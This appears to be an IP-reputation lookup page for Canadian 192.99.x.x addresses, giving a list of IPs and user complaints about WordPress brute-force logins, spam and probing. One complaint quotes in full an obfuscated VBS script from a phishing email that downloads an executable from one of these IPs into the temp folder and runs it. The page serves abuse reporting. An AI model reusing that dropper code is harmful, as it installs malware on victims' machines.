192.99.x.x IP Lookup - Canada
IP addresses in the 192.99.0-63.x range (192.99.0.0 - 192.99.255.255 network). 19 abuse reports have been filed for IPs in this range.
- 192.99.43.15, 192.99.29.48, 192.99.2.96, 192.99.48.4, 192.99.26.59, 192.99.56.253
- 192.99.4.225, 192.99.0.111, 192.99.53.34, 192.99.32.95, 192.99.4.4, 192.99.45.247
- 192.99.10.62, 192.99.31.186, 192.99.5.235, 192.99.32.244, 192.99.4.119, 192.99.28.234
- 192.99.2.89, 192.99.15.150, 192.99.1.67, 192.99.36.173, 192.99.34.175, 192.99.11.82
- 192.99.28.27, 192.99.47.103, 192.99.29.78, 192.99.30.189, 192.99.61.232, 192.99.59.222
- 192.99.57.200, 192.99.60.137, 192.99.24.112, 192.99.58.23, 192.99.23.48, 192.99.13.25
- 192.99.23.200, 192.99.62.126, 192.99.27.111, 192.99.11.148, 192.99.18.14, 192.99.13.163
- 192.99.3.222, 192.99.50.57, 192.99.40.16, 192.99.63.164, 192.99.19.183, 192.99.63.10
- 192.99.16.158, 192.99.57.217, 192.99.59.76, 192.99.22.76, 192.99.56.164, 192.99.26.22
- 192.99.0.98, 192.99.54.118, 192.99.50.232, 192.99.53.184, 192.99.13.228, 192.99.0.78
- 192.99.33.250, 192.99.19.35, 192.99.26.25, 192.99.48.222, 192.99.23.16, 192.99.5.230
- 192.99.10.31, 192.99.57.212, 192.99.4.224, 192.99.23.39, 192.99.3.86, 192.99.46.52
- 192.99.35.3, 192.99.14.217, 192.99.61.169, 192.99.3.213, 192.99.58.196, 192.99.57.144
- 192.99.44.144, 192.99.22.81, 192.99.11.189, 192.99.47.88, 192.99.16.205, 192.99.2.59
- 192.99.18.205, 192.99.42.13, 192.99.63.66, 192.99.61.228, 192.99.43.158, 192.99.2.157
- 192.99.30.185, 192.99.53.48, 192.99.7.21, 192.99.42.200, 192.99.35.172, 192.99.24.85
- 192.99.24.239, 192.99.49.82, 192.99.4.104, 192.99.31.166, 192.99.32.214, 192.99.49.123
- 192.99.47.186, 192.99.22.218, 192.99.59.56, 192.99.19.160, 192.99.39.141, 192.99.20.84
- 192.99.47.239, 192.99.50.247, 192.99.40.134, 192.99.20.0, 192.99.9.33, 192.99.40.22
- 192.99.28.190, 192.99.37.186, 192.99.27.9, 192.99.41.22, 192.99.63.168, 192.99.0.141
- 192.99.7.250, 192.99.54.169, 192.99.56.182, 192.99.43.171, 192.99.19.248, 192.99.19.254
- 192.99.56.88, 192.99.52.77, 192.99.40.244, 192.99.51.202, 192.99.42.146, 192.99.20.109
- 192.99.57.43, 192.99.57.165, 192.99.23.231, 192.99.46.44, 192.99.40.42, 192.99.5.151
- 192.99.29.17, 192.99.52.223, 192.99.33.13, 192.99.6.17, 192.99.22.53, 192.99.9.115
- 192.99.30.166, 192.99.44.90, 192.99.46.161, 192.99.14.235, 192.99.50.224, 192.99.2.235
- 192.99.12.174, 192.99.17.229, 192.99.4.100, 192.99.35.4, 192.99.36.218, 192.99.14.173
- 192.99.3.145, 192.99.58.31, 192.99.62.82, 192.99.10.182, 192.99.33.249, 192.99.16.166
- 192.99.9.65, 192.99.23.24, 192.99.50.147, 192.99.39.75, 192.99.16.128, 192.99.30.78
- 192.99.26.81, 192.99.24.245, 192.99.39.111, 192.99.26.194, 192.99.44.96, 192.99.61.69
- 192.99.0.13, 192.99.49.13, 192.99.38.128, 192.99.58.213, 192.99.49.76, 192.99.55.57
- 192.99.8.46, 192.99.23.9, 192.99.43.89, 192.99.37.242, 192.99.21.31, 192.99.19.198
- 192.99.11.123, 192.99.33.57, 192.99.21.10, 192.99.17.40, 192.99.19.44, 192.99.62.197
- 192.99.31.52, 192.99.41.209, 192.99.52.123, 192.99.32.97, 192.99.49.57, 192.99.51.248
- 192.99.23.245, 192.99.12.196, 192.99.56.175, 192.99.4.2, 192.99.28.9, 192.99.25.77
- 192.99.39.69, 192.99.56.102, 192.99.15.210, 192.99.48.147, 192.99.63.231, 192.99.32.210
- 192.99.41.66, 192.99.1.218, 192.99.45.95, 192.99.54.126, 192.99.33.171, 192.99.61.144
- 192.99.47.111, 192.99.29.72, 192.99.61.163, 192.99.42.172, 192.99.41.178, 192.99.18.140
- 192.99.1.86, 192.99.55.56, 192.99.13.156, 192.99.37.140, 192.99.61.134, 192.99.26.129
- 192.99.61.178, 192.99.10.192, 192.99.63.191, 192.99.33.145, 192.99.45.38, 192.99.59.20
- 192.99.57.22, 192.99.62.148, 192.99.54.16, 192.99.4.89, 192.99.38.68, 192.99.30.73
- 192.99.59.211, 192.99.34.158, 192.99.35.134, 192.99.16.47, 192.99.56.89, 192.99.45.143
- 192.99.31.247, 192.99.13.61, 192.99.56.184, 192.99.13.137, 192.99.56.48, 192.99.16.197
- 192.99.21.84, 192.99.2.104, 192.99.12.30, 192.99.60.85
Showing 256 of 16,384 IPs (192.99.43.15 to 192.99.60.85). Use the pagination below to browse all IPs in this range, or look up any specific IP directly.

192.99.0.98
Complaint by Neil :
This IP address is trying to hack into my website.
192.99.31.194
Complaint by Anonymous :
attack mail server
192.99.11.122
Complaint by ad :
Hi
192.99.11.81
Complaint by RH :
Tried to log in by brut force into my wordpress web
192.99.19.178
Complaint by Angelo Steffenel :
Inside a phishing email there is a VBS script that downloads a file from this address and executes it. Script: Dim KDhnYBYFkCfnMjsyxDhPb KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq" If KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq" Then End If WScript.Sleep 4000 Dim IDYVbPrSxIOQmVHlhhrMe IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY" If IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY" Then End If Dim pWLDnIbAxcaFeCLyYVoMl pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj" If pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj" Then End If path = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%") Dim jbOpkfGOcOSqeMWQsOtIV jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam" If jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam" Then End If path = path & "\" Dim bPKzPmlstEgupMlzTGcLE bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM" If bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM" Then End If URL = "http://192.99.19.178/xdde.exe" Dim UBuVzItKFfJxfYuSyMXRp UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu" If UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu" Then End If DJ = "foyoun.exe" Dim GiTlDQmIBtHlTvWlSngxD GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB" If GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB" Then End If dim GH: Set GH = createobject("Microsoft.XMLHTTP") Dim oCvKtmDggbKnfwaqsfiHn oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz" If oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz" Then End If dim NJ: Set NJ = createobject("Adodb.Stream") Dim XYYujdiLRWsDGyQrMdTdI XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf" If XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf" Then End If GH.Open "GET", URL, False Dim noJDsEnwMRwvIuMKrDqsQ noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ" If noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ" Then End If GH.Send Dim lJfIDLwdMkgxsqlxCSqdl lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi" If lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi" Then End If Dim LvwsgIYDgarbKxryMxqEo LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ" If LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ" Then End If with NJ Dim sIEULnfeEkUwMezeyNsVj sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt" If sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt" Then End If .type = 1 '//binary Dim EfbFlmGxEemgogWpEexDs EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl" If EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl" Then End If .open Dim bVARHccOjqvnFoOVovgLe bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj" If bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj" Then End If .write GH.responseBody Dim ROuABfAUaQknyFlzXwkgu ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm" If ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm" Then End If .savetofile path & DJ, 2 '//overwrite Dim jBOqyenfPJuctlqaxUrJI jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq" If jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq" Then End If end with Dim zEzFClGHhilWxXYPejjuT zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN" If zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN" Then End If Dim zUeKUpPqPdbZxcuJwtsvA zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL" If zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL" Then End If file = path & DJ Dim WqltKUVZZcPQsSPXrAioP WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij" If WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij" Then End If Set WshShell = WScript.CreateObject("WScript.Shell") Dim srTHesvHyvDBrVUtHvBgL srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ" If srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ" Then End If WshShell.Run chr(34) & file & chr(34)
192.99.6.106
Complaint by Anonymous :
This address is used in an exploit, Attempts to download http://192.99.6.106/ddd and execute it with Perl.
192.99.12.128
Complaint by mj :
A host, 192.99.12.128, has been locked out of the WordPress site due to too many attempts to access a file that does not exist.
192.99.12.128
Complaint by George :
This IP was searching for backup files in the root of sites using common patterns.
192.99.7.177
Complaint by Sebastian :
Received Spam to my wordpress comments
192.99.11.81
Complaint by Anonymous :
Repeatedly trying to log in to my WordPress account.
192.99.11.81
Complaint by Anonymous :
Has been trying brute force on my site using "Admin".
192.99.11.81
Complaint by j wells :
attempted hack on my wordpress site from this ip
192.99.11.81
Complaint by Anonymous :
Our site is getting hammered too.. Using "mysite" as the username thinking you might use that for your admin or user log in.
192.99.11.81
Complaint by DarkMatter :
I get the same. This "bot" or whatever it is has been hammering against my site (good luck with that) for the last 4 days and coming from the same 192.99.11.81. Be advised its trying the domainname with out the TLD extension as a username so if your site is mysite.com he's using "mysite" as the username thinking you might use that for your admin or user log in.
192.99.11.81
Complaint by Joe Blow :
Keeps trying to hack my site. Coming in from "hacker90.org." ********.
192.99.11.81
Complaint by J Humphrey :
This IP address was found repeatedly trying to log onto my website as admin using brute force password guessing. 29 March 2016 9:00 CET
192.99.12.128
Complaint by Rudi Lehnert :
This guy tried to hack my blog-O-rama Admin Area: http://blogorama.eisbrecher.net 9 ungültige Anmeldeversuche (3 Sperrung(en)) von IP: 192.99.12.128 Letzter Anmeldeversuch erfolgte mit dem Benutzernamen: ConcepcionBerna IP wurde gesperrt für 9000 Stunden.
192.99.12.128
Complaint by HB :
SPAMMERS and attack on registration
192.99.2.193
Complaint by Rudi Lehnert :
This guy tried to hack my blog-O-rama Admin Area: http://blogorama.eisbrecher.net 9 ungültige Anmeldeversuche (3 Sperrung(en)) von IP: 192.99.2.193 Letzter Anmeldeversuch erfolgte mit dem Benutzernamen: WilliamBraxton IP wurde gesperrt für 9000 Stunden.